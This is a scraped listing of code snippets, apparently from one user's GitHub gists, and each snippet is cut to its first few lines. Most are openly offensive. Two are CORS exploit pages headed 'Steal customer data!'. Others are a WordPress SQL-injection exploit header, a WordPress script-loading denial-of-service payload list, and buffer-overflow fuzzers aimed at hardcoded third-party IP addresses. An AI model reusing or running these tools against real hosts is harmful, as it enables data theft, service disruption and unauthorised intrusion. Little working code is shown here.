This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# coding=utf-8 | |
import requests, re, threading, time | |
from Exploits import printModule | |
r = '\033[31m' | |
g = '\033[32m' | |
y = '\033[33m' | |
b = '\033[34m' | |
m = '\033[35m' | |
c = '\033[36m' | |
w = '\033[37m' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<body> | |
<center> | |
<h3>Steal customer data!</h3> | |
<html> | |
<body> | |
<button type='button' onclick='cors()'>Exploit</button> | |
<p id='demo'></p> | |
<script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<body> | |
<center> | |
<h3>Steal customer data!</h3> | |
<html> | |
<body> | |
<button type='button' onclick='cors()'>Exploit</button> | |
<p id='demo'></p> | |
<script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
error_reporting(E_ALL); | |
$norm_delay = 0; | |
/////////////////////////////////////////////////////////////////////// | |
/////////////////////////////////////////////////////////////////////// | |
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit | |
// written by Andri Wahyudi "Pwn0sec" | |
// http://www.pwn0day.com/ | |
// 27. June 2020 | |
/////////////////////////////////////////////////////////////////////// |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#https://github.com/gh0x0st | |
#[email protected] | |
import sys,socket | |
address = '107.22.193.119' | |
port = 9999 | |
buffer = ['\x41'] | |
counter = 1000 | |
while len(buffer)<= 100: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#https://github.com/gh0x0st | |
#[email protected] | |
import sys,socket | |
address = '46.31.116.71' | |
port = 3389 | |
buffer = ['\x41'] | |
counter = 100 | |
while len(buffer)<= 10: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import threading | |
import random | |
ban = """ | |
01000011 01010110 01000101 00101101 00110010 | |
00110000 00110001 00111000 00101101 00110110 | |
00110011 00111000 00111001 01000101 01111000 | |
01110000 01101100 01101111 01101001 01110100 | |
""" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Website: http://sourceforge.net/projects/simplehtmldom/ | |
* Additional projects that may be used: http://sourceforge.net/projects/debugobject/ | |
* Acknowledge: Jose Solorzano (https://sourceforge.net/projects/php-html/) | |
* Contributions by: | |
* Duck Research (Attribute filters) | |
* Chickflow (Negative indexes supports of "find" method) | |
* 0x1_aulia (Constructor with automatically load contents either text or file/url) | |
* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env php | |
<?php | |
/** | |
* Coded by Duck Research | |
* 27 July 2020 | |
* | |
* Check phone number telco using HLRLookup. | |
* API Documentation: https://www.hlr-lookups.com/en/api-docs | |
*/ |